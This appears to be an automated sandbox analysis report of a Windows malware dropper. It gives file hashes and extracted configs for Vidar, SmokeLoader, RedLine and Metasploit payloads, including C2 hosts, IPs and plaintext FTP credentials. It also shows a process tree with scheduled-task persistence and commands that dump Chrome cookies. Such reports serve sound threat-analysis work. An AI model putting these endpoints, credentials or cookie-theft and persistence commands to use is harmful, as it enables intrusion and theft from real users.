Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1802s
  • max time network
    1820s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    06-08-2021 23:43

General

  • Target

    8 (11).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    files.000webhost.com
  • Port:
    21
  • Username:
    hhh6786
  • Password:
    Sutana666

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Focus1

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

installs

C2

178.32.202.118:43127

Extracted

Family

vidar

Version

39.9

Botnet

937

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Detected phishing page
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 4 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 64 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 34 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 52 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 32 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • Checks SCSI registry key(s) 3 TTPs 15 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 54 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • NTFS ADS 1 IoCs
  • Script User-Agent 9 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1196
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2560
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2552
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2532
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2236
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
              • Modifies registry class
              PID:2224
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1824
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1360
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1288
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1104
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1064
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:7148
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                        2⤵
                        • Executes dropped EXE
                        PID:5344
                        • C:\Windows\SysWOW64\schtasks.exe
                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                          3⤵
                          • Creates scheduled task(s)
                          PID:5780
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:6724
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:1572
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:5680
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:6940
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:4228
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:4752
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:6176
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:5256
                      • C:\Windows\system32\rundll32.exe
                        C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll",hdvAaRs
                        2⤵
                        • Windows security modification
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        PID:6504
                      • C:\Users\Admin\AppData\Roaming\tjbtfje
                        C:\Users\Admin\AppData\Roaming\tjbtfje
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:3984
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:3504
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:5244
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:3864
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:3376
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:4168
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:6424
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:3856
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:2296
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:1868
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:5776
                      • C:\Users\Admin\AppData\Roaming\tjbtfje
                        C:\Users\Admin\AppData\Roaming\tjbtfje
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4956
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:5568
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:5644
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:3976
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:6456
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:4236
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:4680
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:6860
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:6452
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:1848
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:4288
                      • C:\Users\Admin\AppData\Roaming\tjbtfje
                        C:\Users\Admin\AppData\Roaming\tjbtfje
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:2624
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:840
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:68
                      • C:\Users\Admin\AppData\Local\Temp\8 (11).exe
                        "C:\Users\Admin\AppData\Local\Temp\8 (11).exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3356
                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:3800
                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\setup_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\setup_install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:764
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_1.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3000
                              • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_1.exe
                                sonia_1.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:2484
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_3.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3752
                              • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_3.exe
                                sonia_3.exe
                                5⤵
                                • Executes dropped EXE
                                • Modifies system certificate store
                                PID:2088
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 944
                                  6⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4664
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_4.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4060
                              • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_4.exe
                                sonia_4.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1340
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_5.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1272
                              • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_5.exe
                                sonia_5.exe
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                PID:1584
                                • C:\Users\Admin\Documents\S_S9HvluWDRT1ECBBoZ43Bgj.exe
                                  "C:\Users\Admin\Documents\S_S9HvluWDRT1ECBBoZ43Bgj.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • NTFS ADS
                                  PID:4144
                                • C:\Users\Admin\Documents\E2KNGmbUrc8OdFWOG7CVnye6.exe
                                  "C:\Users\Admin\Documents\E2KNGmbUrc8OdFWOG7CVnye6.exe"
                                  6⤵
                                    PID:5116
                                    • C:\Users\Admin\Documents\E2KNGmbUrc8OdFWOG7CVnye6.exe
                                      "C:\Users\Admin\Documents\E2KNGmbUrc8OdFWOG7CVnye6.exe" -q
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4140
                                  • C:\Users\Admin\Documents\wuw85UnkgrcDnyOSjhrbKRzI.exe
                                    "C:\Users\Admin\Documents\wuw85UnkgrcDnyOSjhrbKRzI.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    PID:5104
                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Drops startup file
                                      PID:4532
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:5908
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                        8⤵
                                        • Executes dropped EXE
                                        PID:5976
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:5852
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                        8⤵
                                        • Executes dropped EXE
                                        PID:6032
                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
